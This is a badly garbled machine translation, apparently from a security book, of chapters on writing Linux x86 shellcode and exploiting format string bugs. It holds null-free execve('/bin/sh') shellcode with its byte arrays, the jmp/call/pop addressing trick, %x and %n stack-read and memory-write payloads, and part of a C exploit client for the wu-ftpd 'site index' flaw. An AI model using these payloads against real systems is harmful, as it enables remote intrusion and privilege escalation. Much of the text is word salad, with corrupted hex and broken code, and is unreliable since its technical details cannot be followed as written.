cu experienta unu din major trucuri muncă Cu implementate cod La fel de vedea al nostru Codul într-adevăr lucru, dar, la din pacate cel exemplu cu greu dacă potrivi pentru practic aplicatii LA Următorul secțiune va fi afișate Cum Schimbare a lui pentru implementare în tampon intrare eliminare caractere nule eliminare caractere nule cu cel mai mult probabil loc pentru cazare implementate cod este tampon unsprezece ce Mai mult mai probabil tampon va fi introduce tu simbolic matrice Dacă întoarcere Puțin înapoi și vedere implementate Codul, tu înștiințare în limba germana niste caractere nule (\x ): \xbb\x \x \x \x \xb \x \x \x \x \xcd\x I caractere ul va apela inoperabilitate implementate cod în simbolic matrice, deoarece ce caracter nul interpretat Cum simbol completare (Chrocks Trebuie sa spectacol Puțin ingeniozitate și Vino cu, Cum scapă de din caractere nule în mașinărie coduri La sarcini mânca Două popular solutii eu Primul — a inlocui asamblator comenzi Cu caractere nule echivalent echipe, nu conținând caractere nule Al doilea decizie niste mai dificil: aceasta bazat pe dinamic (în timp împlinire programe) introduce glonţ- personaje echipe, nu conținând zerouri Dar pentru acest necesar stiu corect Locație implementate cod în memorie, asa de noi scoate al doilea decizie inainte de Următorul, Mai mult complex exemplu Să ne întoarcem la al nostru Trei asamblator echipe și relevante mașinărie coduri: mov ebx O \xbb\x \x \x \x mov ex \xb \x \x \x \x int x \xcd\x Caractere nule întâlni în primul Două comenzi Dacă tu Mai mult nu uitat boolean algebră și asamblator, apoi tine minte ce Operațiune "exclusiv SAU" (comanda porc) se intoarce gloanțe, dacă ambii operand sunt egale Prin urmare, dacă se angajează comanda porc pentru Două evident egal operanzi, noi primim sens fără utilizare caracter nul în echipă În loc de A merge, la resetare Inregistreaza-te EVH echipă mutare, noi hai sa folosim echipă porc Asa de, primul comanda: mov ebx O Acest comanda se întoarce în porc ebx ebx Asa de modul în care unu din comenzi noi cruţat din zerouri — curând noi în acest asigurați-vă că Unde a început zerouri în al doilea echipă, dupa toate acestea noi nu aducem zero valoare în Inregistreaza-te? Nu a uita ce în echipă implicat pe de biți Inregistreaza-te Noi mutare numai unu octet, apoi Cum Inregistreaza-te EAH conţine loc pentru patru Odihnă Trei octeți sunt umplute zerouri H toby rezolva acest problemă suficient aminteste, ce fiecare pe de biți Inregistreaza-te este împărțit pe Două pe biți "regiuni" și la primul din lor poate sa aplica Cum la Inregistreaza-te OH Mai departe, pe biți Inregistreaza-te OH de asemenea este împărțit pe repi-(■trei UN și AL Dacă pentru tine Necesar numai Junior pic, utilizare regis tr AL Binar sens va lua pic, noi hai sa aducem a lui în Inregistreaza-te și scapă de din nu necesitate Scor EAH zerouri Asa de, al doilea comanda: PC)V ("(IX eu Capitol Introdus Codul Acest iniţială comanda este înlocuit echipă, în care în loc de EAH folosit Inregistreaza-te AL: mov al , hai sa sa verificam ce noi într-adevăr a scăpat de din caractere nule Să scriem nou asamblator comenzi și sa vedem, nu întâlni dacă printre lor zerouri: Secțiune text global start start xor ebx ebx mov al int x S-o facem concluzie conţinut obiectiv fişier utilitate objdump: [slap@ day rădăcină] nasm -f elf exit shelIcode asm [slap@ day rădăcină] ID -o exit shelIcode exit shelIcode [slap@ day rădăcină] objdump -d exit shelIcode exit shelIcode fişier format elf -i Dezasamblarea de secțiune text- : : db xor %bx Debx LO mov $ x da : CD int x USD Asa de modul în care mașinărie comenzi Cu zerouri îndepărtat, A volum implementate cod vizibil scăzut Acum noi avem complet lucrabil, și ce Mai mult mai important, — potrivit pentru implementare Codul lansa comanda procesor Al nostru protozoar implementate Codul pentru apel Ieșire() — nu Mai mult Cum educational exercițiu cu greu dacă pentru -l poate sa găsi niste practic aplicarea Dacă pentru tine a luat complet proces Cu vulnerabil zonă intrare, mai simplu completati a ei invalid comenzi Program de urgență va lua sfarsit și Efect va fi practic subiecte la fel, ce și la implementare cod Ieșire() In orice caz, aceasta este nu mijloace, ce Toata lumea a petrecut eforturi plecat pentru nimic Apel Ieșire() poate sa utilizare în prieten implementate cod, la do ceva permanent și corect complet proces Uneori aceasta este poate a fi sănătos LA acest secțiune noi considera Mai mult interesant sarcină — lansa privilegiat comanda procesor, care poate folosit pentru neautorizat pătrundere în sistem La fel de și în anterior secțiune, noi scrie implementate Codul "Cu zero" pentru OS linux pe procesoare IA Procedură va fi constau din cinci etape: Scris implementate cod pe limba înalt nivel Compilare și demontare nivel inalt iroi rame lansa comanda procesor Analiză muncă programe pe asamblator nivel patru "Curățenie" asamblator cod, căutarea tăieturi a lui volum și oportunități implementare cinci extracţie mașinărie comenzi și creare implementate cod eu In absenta nerv etapă noi scrie simplu program pe limba DIN pentru lansa comanda procesor Pentru acest mai simplu și Mai repede Total crea nou proces LA linux exista Două cale creare procese: sau pe baza existent proces Cu substituţie deja executabil programe, sau creare săpa existent proces și lansa nou programe pe a ei loc Nucleu se va face Toata lumea necesar pe tu — suficient a raporta miez ce exact trebuie sa do, provocare sistemică funcții furculiţă() sau exhes() de comun acord lork() și exec() crea copie existent proces, apoi Cum funcţie exec() se pe tu execută un alt program pe loc existent eu Ioidem pe cel mai simplu cale și hai sa folosim separa provocare exhes() Mai departe este dată apel exec() în simplu Programul C: #include int malno char *fericit[ ]; fericit[ ] = „/bin/sh”, fericit[l] = NUL, exesve (fericit[ ], fericit NUL), } Să compilam și Fă-o program, A se asigura ce ea lucru exact iak, Cum conceput: Lslap@Oday rădăcină]# gcc spawnshel c -o spawnshel [slap@ day rădăcină]# /spawnshel sh- b# La fel de vedea comanda CPU cu succes a început Samo pe tu aceasta este nu foarte interesant, dar Imagina, ce cel Codul implementate și efectuat în modul la distanta acces — pe loc va deveni clar, ce fel oportunități se deschide acest minion program ȘI acum, la al nostru program a fost efectuat la în interior în vulnerabil regiune intrare, a ei necesar difuzat în nivel scăzut hexazecimal mașinărie coduri Do aceasta este nu e complicat Primul program prelucrate compilator gcc Cu cheie -static; Cum și inainte de dar previne dinamic aspect și salvează Locație eik-întuneric funcții exec() în memorie: gcc -static -despre coajă de icre spawnshel! Cu Împrumut program dezasamblat pentru primind mașinărie comenzi Prine leneş Mai departe rezultat împlinire utilitati objdump a fost scurtat pentru eco tine minte locuri — afișate numai fundamental fragmente: d : BOHBldQ Apăsaţi %ebp () dl e mov %esp,^ebp ('( sub $ x Desr Capitol Introdus Codul d - e fo și SOxffffffOJesp d : b mov $ x Deah de: c sub £eax %esp e c f ef movl $ x ef , xfffffff (^ebp) e • c fc movl $ x ,Oxfffffffc(^ebp) ee- a ei sub $ x %esp $ x P: a împinge $ x O -GZ: D f lea xffffff (%ebp) %eax -G Apăsaţi £eax G : ff f pushl xffffff "ebp) fa- e fi caii d fO ff• c adăuga x USD ^esp * c părăsi * c ret d f d f - Apăsaţi %ebp d f • b mov $ x Deah d f : e mov %esp Lehr d f * test CO %eax Deah d fa Apăsaţi £edi d fb Apăsaţi %bx d fc: b d mov x (%ebp) Jedi d ff je da da e fa fb f cal da b d c mov oxc(^ebp),%ecx da * b mov x (^ebpMedx da c Apăsaţi %bx da d fb mov %edi Debx da f: b b mov xb USD Deah dal CD int x USD dal b pop %bx dal d fo ff ff emp $ xffffff %eax dalc c mov ^eax ^ebx dale Ja da da d mov %bx Deah da b pop %bx da f pop £edi da c părăsi da : c ret da f db neg %bx da e cf ab ff ff caii fc da d mov £ebx, (£eax) da f bb ff ff ff ff mov $OxffffffffDebx da - eb ea jmp da da de cand da de cand La fel de vedea Codul apel sistemică funcții exec() conţine suficient voluminos listă comenzi Ne o sa ai nevoie destul de putine timp la scapă de din toate zerouri și optimiza implementate Codul Sa ne cunoastem Cu funcţie exec() mai aproape și sa incercam a intelege, ce la fel exact Aici petrecându-se Cunoștință mai bine Total a incepe Cu pagini de pălărie exhes() LA primul Două paragrafe descrieri conținea foarte lanţ informație: int execve(const char *nume de fișier, char *const argv], (har A( oir l t'iivpl ) lansa comanda procesor • ) Funcţie exec() execută program, pe care indica argument nume de fișier Argument nume de fișier ar trebui să a stabilit sau binar performant fişier, sau scenariu, început co linii în format interpret [argument]" LA ultimul caz interpret seturi valabil Nume executabil fişier, care nu este scenariu și numit în format interpret [argument] nume de fișier <> Argv — matrice linii argumente transmise nou program Epvar — matrice linii (tradiţional în formă cheie=valoare), transmise nou program în calitate mediu inconjurator Ambii matrice, argv și epvir, trebuie sa Sfârşit zero indicator LA pagina de pălărie spus ce noi Poate sa a fi cu fermitate sigur în volum, ce în funcţie exesve la apel transmise Trei argument Din anterior exemplu Cu provocare Ieșire() noi deja noi stim Cum organizat difuzat argumente sistemică funcții în linux (inainte de şase argumente sunt în curs de încărcare în registre) Cu exceptia th merge, în pagina de manual spus ce Toata lumea Trei argument trebuie sa a fi indicii: primul — indicator pe şir Cu Nume executabil binar fişier; al doilea — indicator pe matrice argumente al treilea și ultimul — indicator pe matrice Cu variabile mediu inconjurator (în al nostru caz a lui poate sa părăsi gol deoarece ce la ne în exemplu aceste date nu sunt transmise) NOTĂ - - Asa de Cum vorbire merge despre transfer indicatoare pe linia, nu a uita despre completare toate transmise linii caractere nule Asa de, pentru apel funcții noi trebuie sa loc date în patru Inregistreaza-te; în unu Inregistreaza-te va fi ținut Codul sistemică funcții (OxOb în hexazecimal înregistrări), A în Trei alții — argumente După cazare în registre argumente în corect format ramane apel sistemică funcţie Informație, depus în pagina de manual va ajuta a intelege în dezasamblat cod Început Cu al șaptelea comenzi principal, adresa linii /bin/sh copiat în memorie Mai tarziu un alt comanda va copia aceste date în Inregistreaza-te, care va fi folosit pentru transmitere argument exeziv: IEO• moѵ $ x ef Oxffff f f f "ebp) Apoi în vecine celulă memorie copiat zero sens Aceasta la fel va fi copiat în Inregistreaza-te și folosit pentru apel sistemică caracteristici: e movl $ x Oxffffffc(^ebp) După acest argumente sunt introduse în grămadă, la ei au fost disponibil după apel wa exeziv Primul a intrat nul argument (mediu inconjurator): I Apăsaţi $ x Următorul a intrat în grămadă adresa matrice argumente (fericit[ ]): PZ lea xffffff (%ebp) ° eax HO Apăsaţi Capitol Introdus Codul LA ultimul întoarce în grămadă a intrat adresa linii /bin/sh: T : pushl xffffff (%ebp) Acum numit funcţie exeziv: fa: caii d fO Funcţie trebuie sa a pregati registre și Genera întrerupe LA scopuri optimizare, nu legate de Cu functionare implementate cod, Funcția C difuzat pe asamblator suficient viclean cale Necesar exact defini, ce pentru ne important, A pe ce poate sa nu convertit Atenţie Primul important comanda încărcături adresa linii /bin/sh în Inregistreaza-te EVH: d fc- mov x (%ebp) edi da d mov £edi Lehx Apoi adresa matrice argumente Se încarcă în Inregistreaza-te ECX: da : mov Ox Sheep) Desh Următorul comanda încărcături adresa zero în EDX: da : mov x (^ebpMedx Ultimul este umplut Inregistreaza-te EAH, în care plasat Codul ohh sistemică funcții exeziv: da f • mov $ xLeah Pregătirea terminat Comanda int x efectueaza comutarea în modul miez, Unde și efectuat sistemică funcţie: dal int x USD După ce am rezolvat Cu teorie apel exesve pe asamblator nivel, după demontare programe C poate sa trece peste la creare proprii implementate cod Din ultimul exemplu Cu sistemică funcţie Ieșire() tu deja tu stii ce la creare implementate cod apare destul de putine Probleme NOTĂ - - În loc de A merge la crea defect implementate Codul și "repara" a lui pe merge, Cum aceasta este a fost făcut în anterior exemplu, noi pe loc Hai sa facem Toata lumea dreapta La fel de și în anterior caz, apare neplăcut problemă Cu caractere nule — ei implicat în Se încarcă registre EAH și edx Nu cheltuieli a uita și despre caracter nul, final şir /bin/sh LA principiu noi ar putea ar profită deja familiar recepţie, temeinic ridicând echipe, nu conținând zero octeți aceasta — simplu opțiune, dar acum noi considera al doilea, Mai mult complicat La fel de deja remarcat în implementate cod este interzis greu codifica adrese Fixare adrese reduce probabilitate A merge, ce implementate Codul va fi muncă în diferit versiuni linux și în diferit vulnerabil programe Introdus Codul ar trebui să a fi pe oportunități universal, la a lui nu a trebuit sa rescrie din nou la toata lumea utilizare Pentru solutii Probleme aplicabil relativ adresarea Exista diferit scheme relativ adresarea; în acest capitol va fi folosit cel mai popular ii P k/іаssiііchsсіii metodă relativ adresarea în implementate cod lansa comanda procesor Chooby implementează plin de înțeles relativ adresarea în implementate cod, ar trebui să loc în Inregistreaza-te adresa, Cu pe cine implementate Codul start Cu memorie, sau adresa niste important element implementate cod După -l în program poate sa utilizare echipe, în care adrese sunt date ( pavaj pe relație la abordare, stocate în Inregistreaza-te LA clasic implementare acest truc implementate Codul începe Cu comenzi necondiţionat tranziție jmp, transmiterea Control echipă caii, situat după principal cod La implementare comenzi caii în grămadă a intrat adresa echipe, Următorul direct pe a ei Rămășițe pe loc la fel pe echipă caii loc acestea date, care trebuie sa folosit în calitate bazele pentru raporta gel adresarea Baza adresa automat conservat în grămadă, n ne nu trebuie sa stiu a lui anticipat In orice caz, principal parte implementate cod Toata lumea la fel trebuie sa a fi efectuat, pe- și omu comanda caii transmite Control echipă, situat pe loc la fel pe primul echipă jmp Asa de modul în care performanţă se intoarce la început implementate cod In cele din urma, pe loc la fel pe jmp trebuie sa urma comanda pop esi, care extracte baza adresa din grămadă și locuri a lui în Inregistreaza-te ESI Acum noi Poate sa abordare la octeți implementate cod, întrebând părtinire relativ eu SL Următorul pseudo cod va ajuta a intelege, Cum lucru acest sistem jmp mic de statura GotoCal shellcode pop esl (lotoCai • Caii shellcode Db „/bin/sh” Directivă db, apoi mânca "Defini octeți" (Cu tehnic puncte viziune aceasta este exact directivă, A nu comanda), rezerve spaţiu în memorie pentru depozitare Cu i stânci La implementare cod se întâmplă următoarele evolutii: eu Primul efectuat comanda tranziție pe eticheta trebuie sa sun, ce imediat Oportunitati la implementare comenzi caii ? Comanda caii salvează adresa primul octeți linii (/bin/sh) în grămadă Comanda caii transmite Control implementate cod Primul comanda implementate cod pop ESI extracte adresa linii din grămadă și încărcături a lui în ESI '> Acum la implementare de bază părți implementate cod poate folosit relativ adresarea Hotărând problemă adresarea, Să mergem mai departe la scris de bază părți Împingeți spre) cod pa pseudo cod Mai tarziu noi a inlocui a lui real asamblator comenzi LA Sfârşit linii va fi rezervat regiune din nouă octet, gol c e pop £esi - coxor %eax,%eax - mov %al, x (%es i) : dle ceai №si) Debx a e mov %ebx, x (%esi) d c mov %eax, xc(%esi) bO b mov $ xb,%al - f mov %esi,£ebx - D e lea x (%esi) Desh • d c lea xc(%esi),%edx a- CD int x USD C c: e el ff ff ff caii al f das a - e legat %ebp, x e(£ecx) : f das a : jae a a dec £edx a inc %ecx aa inc %ecx (l ab ■ inc %ecx O ac inc %ecx ad b dec !£ebx l' (M ae b dec %bx af b dec %bx ()bO b dec da unsprezece ( ii >l (<> zi linux]# m e Atenţie: implementate Codul nu conţine nici caractere nule, nici greu i iko/nirovain adrese Rămășițe numai crea implementate Codul și subclară la (' roi cadru Capitol Introdus Codul char ea^"^yaVx eXx Rxc Xx Xx Vx Vx dXxleXx gXx eXx Xx Xx „ „\x c\xb \x b\x \xf \x d\x e\x \x d\x \x c\xcd\x \xe \xel” „\xff\xff\xff\x f\x \x \x e\x f\x \x \x a\x \x \x \x ” „\x b\x b\x b\x b”; int principalO int *ret, ret = (Int *)&ret + ; (*ret) = (int)shellcode; } Noi primit lucrabil implementate Codul Dacă o sa ai nevoie în plus a tăia a lui volum, poate sa a încerca pune deoparte regiune substituenți în Sfârşit cod: char shel code[] = „\xeb\xla\x e\x \xc \x \x \x \x d\xle\x \x e\x \x \x ” „\x c\xb \x b\x \xf \x d\x e\x \x d\x \x c\xcd\x \xe \xel” ”\xff\xff\xff\x f\x \x \x e\x f\x \x ” LA alții capitole voi prezentat Mai mult complex trucuri clădire implementate cod, A la fel principii a lui utilizare în alții arhitecturi Rezultate LA acest capitol a fost afișate Cum crea implementate Codul pentru procesor x în sistem linux Sunt comune principii Mai folosit și la în curs de dezvoltare implementate cod pentru alții procesoare și săli de operație sisteme, cu toate că sintaxă va fi să arate ca in caz contrar (Poate, pentru tine Trebuie să se angajează alte registre, sau la fel sala de operatie sistem nu va fi a sustine sistemică funcții — Cum, de exemplu, Windows) Foarte important, la implementate Codul a fost Cum poate sa mai compact și nu creată Probleme Cu execuţie (Cum, de exemplu, la disponibilitate caractere nule în simbolic matrice) compactitatea va permite utilizare implementate Codul Cu maxim cantitate potenţial vulnerabil tampoane Ce preocupări fezabilitate cod, în acest capitol au fost prezentat cel mai uzual și simplu moduri a ei Securitate Pe pagini acest cărți tu Mai mult a se familiariza Cu mulți alții trucuri și soiuri trucuri, menționat în dat capitol CAPITOL patru Defecte format linii Acest capitol dedicat defecte format linii în linux, cu toate că acest problemă și IG legat la specific sala de operatie sistem LA a lui cel mai răspândită formă defecte format linii apărea din cauza specific Caracteristici mecanisme apel funcții Cu variabile număr argumente și limba DIN Asa de Cum defecte format linii condiţionat limba DIN, ei Mai ( a intra în orice sala de operatie sistem, pentru care disponibil compilator și іyka DIN, apoi mânca practic în orice din existent săli de operație sisteme eu De ce în general exista defecte format linii? Acest întrebare discuta în secțiune „ Cauze defecte format linii " ATENŢIE - Pentru înţelegere material acest capitole Necesar de bază cunoştinţe limbi pro-i berbec familii DIN, A la fel asamblator x Practic aptitudini linux util, dar nu necesar concept format linii 'Iubesc a intelege, ce tu prezent format linia, necesar познакомиться Cu Probleme pentru solutii care ei au fost dezvoltat Mulți programe în jucărie sau diferit formă retrage text date, printre care ora întâlni numere Sa spunem program afișează şir Cu monetar i iul eu „P (\іr Sumă]nSterl nq) Capitol patru Defecte format linii LA primul parametru funcții transmise format linia — constant linia Cu umpluturi, determinarea loc substituiri variabile Pentru includere numere tip dubla în format şir aplicat specificatorul format %f specificatorul include din mai multe componente (steaguri, lăţime și precizie), determinarea format ieșire LA al nostru exemplu folosit componentă precizie, care indica, ce număr trebuie sa ieșire Cu Două semne în fracționat părți Componente lăţime și precizie în al nostru simplu exemplu nu implicat La tu primit reprezentare despre specificatorii format, hai sa aducem exemplu programe, care afișează masa ASCII Cu indicând zecimal și hexazecimal coduri simboluri, A la fel lor echivalente în ASCII: #include #include int principal( int argc, char *argv[] ) { int c: printf( "Zecimal hex personaj\n" ) printf( ======= === =========\n" ) pentru( c = x , c //include int principal( int argc, char *argv[] ) f( argc '= ) printfC'Errore - livra A format şir te rog\n"): întoarcere , printf( argv[l] ) printf( "\n" ), întoarcere Capitol patru Defecte format linii Să compilam program Următorul comanda: ss fmt Cu -despre fmt Acum să fugim a ei astfel de comanda linia: /fmt "%X %X %X %X" aceasta mijloace ce noi de fapt apel funcţie printf în formă printf( 'lx uh %X %X" ) , Aici important apoi, ce noi indicat format linia, dar nu predat patru numeric variabile, care trebuie sa a fi în a ei substituit La fel de nici ciudat, apel printf trece fără eșecuri, A rezultat arata aproximativ Asa de: s s s bffff bffff e Asa de, funcţie printf() de undeva a luat patru argument La fel de se dovedește ei au fost Luat din grămadă Pe primul vedere pare, ce special Probleme aceasta este nu creează, dacă nu gândi A merge, ce atac poate vedere conţinut grămadă Ce aceasta este mijloace? Teoretic la vizionare poate deschide confidenţial informație (sa spunem nume utilizatorii și parole), dar problemă minciuni Mai mult Mai adânc La transfer mare cantități specificatorii %X va fi primit suficient interesant rezultat: /fmt „KKK/\^KKKKKKKK^KK^%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x%x%x%x%x%x lxMxlxlxlxlxlxlxlxlxlxlxlxlxlxl %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %x%x%x%x%x%x" AAAAAAAAAAAAAAAAA cbffff d el cbffff e bffff bffff ae bffff e a bffff abc d bffff cc bffff c cc bffff bffff bffffa ebffffablbffffac bffffae bffffaf bffffb bffffb abffffb cbffffb ebffffb bbffffb bffffb ebffffb bffffd bffffd bffffd bffffdadbffffdc bffffdcfbffffddabffffdebbffffdf bffffe bffffe fbffffe bffffe bffffe bffffe bffffe bffffe fbffffe abffffe bffffed bffffee bffffef bffffff abfffffflbbffffff bbffffffd bfffffde febfbff b c d e fbffff d f e d La fel de vedea noi extrase din grămadă suficient mare volum date, dar mai aproape la Sfârşit linii e gasit hexazecimal reprezentare start linii: Rezultat Puțin neașteptat, dar destul de logic, dacă a lua în considerare, ce se format linia de asemenea stocate în grămadă, asa de octeți segmente linii de asemenea transmise în formă "numerele" pentru substituiri Asa de modul în care noi primim conţinut grămadă în hexazecimal format Ce Mai mult poate sa do? Pentru start cheltuieli познакомиться Cu alții specificatorii tipuri, A d/iya acest trebuie sa a executa comanda thailandez argipig Tu vedea penalizare i și despre defect format linii numeroase specificatorii transformări — d, eu, despre, și și X pentru întreg chi- (cap ; e, f, g și A pentru material și Cu pentru personaje LA listă la fel dai peste /irugne interesant specificatorii care muncă nu Cu simplu numere: ■ ) s argument interpretat Cum indicator pe linia, substituit în weekend date • > și - argument interpretat Cum indicator pe întreg număr (sau a lui o singura data- noutate ca mic de statura) De abordare, pe care indica argument, conservat număr simboluri, retras inainte de prezent moment Și iak, dacă aprinde în format şir specificatorul %P, apoi în celulă memorie- iii, dat argument va fi înregistrate număr retras personaje: /fmt „AAAAAAAAAAAAAAAAAAAAAAAAMPIPShpShpypShp” The exemplu Mai mult interesant — el demonstreaza Pericol, care apărea i la in apa format linii utilizator Sunt de acord anterior Descriere specificatorii format printf, specificatorul tip %P consideră ( urla argument Cum adresa, și scrie pe specificat abordare număr ieșire-/ign și lor personaje ȘI aceasta este mijloace ce noi Poate sa a inlocui conţinut memorie dar niste adrese Cu scop interceptare management Nu a fi suparat dacă nu „Oveem înțeles esență ce se întâmplă — toate rămas parte capitole conţine detaliat explicatii В('|)іісмся la exemplu Cu masa ASCII specificatorul lăţime permite management-cinci eu" cantitate retras personaje; dacă o sa ai nevoie retrage simboluri, noi indica specificatorul % x Funcţie afișează hexazecimal •baut, care completate iniţială zerouri inainte de cifre L geluri in acelasi timp aminteste, ce argumente funcții printf Mai lua din cel mai G i stâncos (Cum în exemplu Cu ), devine Este curat, ce specificatorul %P poate folosit pentru înregistrări definit ne valorile pe selectat ne la fel abordare Utilizare dat circumstanțe va permite ne a executa arbitrar Codul, Asa de Cum la acest efectuat următoarele termeni: > Noi administra valorile argumente și Poate sa scrie număr retras personaje în arbitrar celulă memorie • > specificatorul lăţime permite supliment weekend date practic schi inainte de arbitrar lungime — în volum inclusiv inainte de personaje Asa de modul în care noi Poate sa a inlocui unu octet arbitrar sens pe al nostru alegere ■ > eu Іovgoriv înlocuire patru ori, noi a inlocui aproape orice patru octeți valoare- niem pe al nostru alegere Rescriere patru octeți este echivalent cu înlocuire adrese In orice caz, la înregistrări în adrese Cu octeți apărea Probleme, deoarece în DIN octet este semn completare linii Probabil, problemă a reusi rezolva record Două octeți început Cu anterior adrese •> Deoarece în general caz noi Poate sa a sti adresa indicator pe functii) (salvat adresa întoarcere, binar masa import, v-tabel DIN b i), transferat c i stâncă va fi efectuat Cum program Codul Capitol patru Defecte format linii Cheltuieli specifica pe niste uzual iluzii, legate de la atacuri pe baza format linii: despre Sunt muncă nu numai în UNIX despre Sunt nu neapărat muncă pe baza grămadă despre LA general caz mecanisme protecţie grămadă din lor nu salva despre La fel de regulă lor a reusi dezvălui mijloace static analiză cod Toata lumea aceste iluzii Bun lămurit în Descriere vulnerabilități format linii Van Digul VShell SSH Poarta de acces pentru Windows pe abordare www atstake com/ research/advisories/ /a -l txt Defecte format linii Genera suficient serios vulnerabilitate Posibilitate împlinire arbitrar cod în programatic componentă conductiv autentificare utilizatori, face restricții acces practic fără înţeles Viclean atac poate relativ uşor salva text protocol toate personalizat sesiuni sau lua sistem sub A mea Control Să rezumam rezultat: defecte format linii apărea la includere date, introdus utilizator, în format linii funcții familii printf Atac introduce de prisos specificatorii format, pentru care în grămadă Nu relevante argumente și în loc de dispărut argumente sunt utilizate valorile din grămadă aceasta Oportunitati la scurgere informație și teoretic — la oportunități împlinire arbitrar cod Utilizare defecte format linii Când în program numit funcţie familii printf, a ei Opțiuni transmise în grămadă La fel de menționat anterior, la deficit parametrii funcţie printf beretă din grămadă următoarele valorile și utilizări lor în loc de dispărut argumente De obicei format linia la fel stocate în grămadă, asa de noi Poate sa Cu a ei Ajutor transmite argumente folosit funcţie printf la prelucrare specificatorii format Anterior deja a fost afișate ce în niste situatii defecte format linii Mai aplica pentru ieșire conţinut grămadă in orice caz la lor mânca Mai mult util aplicarea — performanţă arbitrar cod pe Verifica soiuri specificatorul %P (noi Mai mult ne vom intoarce la acest subiect) Mai mult unu, Mai mult interesant cale exploatare defecte format linii este în utilizare specificatorul %P pentru modificări date în memorie și fundamental schimbări comportament programe Sa spunem program poate a pastra parola niste administrativ funcții în memorie Dacă scrie pe loc parola caracter nul la Ajutor specificatorul %P, th administrativ funcţie poate sa va fi îndeplini Cu gol parola bun obiecte pentru aiakp la fel' sunt idei i pfikator povară" iop i i gpia (lisei II), Utilizare defecte format linii IHD) și identificator grupuri (Grup id, GUID) — dacă program va oferi* G acces la niste resursă sau schimbări A mea nivel privilegii pe bază date, stocate în memorie Modificare astfel de date de fapt paralizează sistem Securitate De viclean și abundenţă nuanțe la format linii Nu concurenți Hai sa luam specific exemplu pentru studiu — Daemon FTP Washington Universitate, care în versiuni conținea cuplu defecte format linii Iniţială alerta CERT despre aceste defecte poate sa găsi pe abordare www cert oi (|/advisories/CA- - htmL The exemplu mai ales interesant deoarece ce are întreg din apropiere proprietăți, foarte important pentru practic exemplu: ■ > asemănătoare textele programe disponibil; la dorință poate sa uşor Descarca și ton vulnerabil versiune ■) Defect se aplică la categorii la distanta atacuri (apoi mânca poate folosit în modul anonim intrare) și asa de este foarte real amenințare -) administrator conexiune servit unu proces, mulțumită ce consecutiv operațiuni înregistrări efectuat în unu vizate spaţiu •> rezultate reprodus în modul ecou ce simplifică demonstrație mutare primind informație Pentru tine o sa ai nevoie un calculator Cu sistem linux, compilator gcc, depanator rDI) n toata lumea unelte, necesar pentru descărcări demon wu-ftpd , dar abordare ftp://ftp wu-ftpd Org/pub/wu-ftpd-attic/wu-ftpd- tar gz In acelasi timp poate sa Descarca fişier wu-ftpd- tar gz asc și asigurați-vă că în volum, ce Arhiva nu a fost modificat, cu toate că aceasta este și nu neapărat Complet Toata lumea instrucțiuni pe instalare și la șantier wu-ftpd Desigur, ar trebui să tine minte, ce după instalatii demon ta un calculator devine vulnerabil pentru ahak, folosind defect wu-ftpd, Asa de ce Accept măsuri de precauție- m"ii sufla linii, retrage din clădire deloc nu e complicat voi x %X %>x %X') site-ul Index %X X X %X %X %X %X %X -index nouă nouă bfffcacc paisprezece paisprezece (Sfârşit de 'Index %X %X X %X X %X X %X') qul t -tu avea transferat octeți în fi da -Total trafic pentru acest sesslon a fost octeți În transferuri -mulțumesc tu pentru uslng cel FTP serviciu pe vulcan ngssoftware porumb La revedere Conectare închis de forelgn gazdă [root@atacker]# La fel de vedea inclusiv specificatorul %X în comanda site-ul ex și (Mai mult mai interesant) site-ul index, noi ar putea extrage date din grămadă descris anterior cale Dacă introduce Următorul echipă, demonul wu-ftpd voi incerca scrie întreg număr pe adrese x , x , Oxbffcacc și x : site-ul Index aceasta va conduce la greşeală segmentare, deoarece adrese x și x nu permite record hai sa sa incercam: site-ul index №№ Conectare închis de străin gazdă Apropo zicală vulnerabilitate comenzi site-ul index relativ puțin știut asa de mulți sisteme detectare invazii (Intruziune detectare sisteme, IDS) a ei nu urmări Pe moment scris cărți standard baza reguli Sforâie interceptat numai invazie prin comanda site-ul ex O scurgere informație LA continuare al nostru exemplu Cu wu-ftpd hai sa sa vedem, Cum merge mai departe citind informație din atacat sisteme Citind informație din grămadă deja considerată Să începem Cu creare necomplicat Test programe, simplificând transfer format linii echipă site-ul index Hai sa sunăm a ei dowu c # include # include # include #include #include #include # include # include Utilizare defecte format linii //іік lude II iik lude //du lude II și la lude iul connect to server(car*gazdă){ struct gazdă *cp; struct sockaddrjn ci; int ciorap if(gazdă==NULL||*gazdă==(caracter) ){ fprintf(stderr,"Invalid numele gazdă\n"); ieșire (l); dacă((cl sin adresă s addr=inet adresa(gazdă))==-l) { - - - f((hp=gethostbyname(gazdă))==NULL) fpnntf(stderr " Nu se poate rezolva £s\n" host), ies ( ): } iik'iik py((char*)&cl sin addr (char*)hp->h addr sizeof(cl sin addr)) if((sock=socket(PF INET SOCK STREAM IPPROTO TCP))==-!) fprintf(stderr "Eroare crearea priză %s\n" strerror(errno)); ieșire (l) } cl sin family=PF INET cl sin port=htons( ) if(connect(sock (struct ) sockaddr*)&cl,sizeof(cl))==-l) fprintf(stderr " Nu se poate conectați la %s %s\n" host strerror(errno)) întoarcere ciorap zero primire de server( int s int prinţ ) eu ml retval t har bufE * ] iiK'insot ( piele de bivol * ) ri'tval K'( v( piele de bivol, ( I * ) ) Capitol patru Defecte format linii f( retval > ) { f( prinţ ) printf( 'Este", piele de bivol ); } el se { f( imprimare) printf( „Nimic la primire\ întoarcere , întoarcere ; int ftp send( int s, char *psz ) { trimite( s psz, strlen( psz ), ); întoarcere , } int sintaxa O { printf("Folosiți\ndo wu \ întoarcere , int ma n( int argc, char *argv[] ) { int s, char piele de bivol[ * ], char tmp[ ], f( argc != patru ) întoarcere sintaxăO: s = conecta la server( argv[l] ); f( s # include int malno { asm("\ xor £eax, ^eax \ xor %ecx %ecx,\ xor %edx %edx;\ mov x USD ^al \ xor £ebx %ebx,\ mov x USD W,\ int $ x \ ") întoarcere : } Sistemică funcţie Ieșire numit echipă int x Compila program, alerga și asigurați-vă că în volum, ce ea lucru Ne o sa ai nevoie numai niste octeți și pentru depozitare cod poate sa profită masa A primit Adresa printf este pe abordare x d b Sa spunem intrare va fi produs Cu adrese x d b și Mai departe Apare întrebare — Cum scrie "lung" sens pe selectat ne abordare? Noi deja noi stim ce pentru înregistrări "mic de statura" valorile poate sa profită specificatorul %P Asa de modul în care teoretic noi 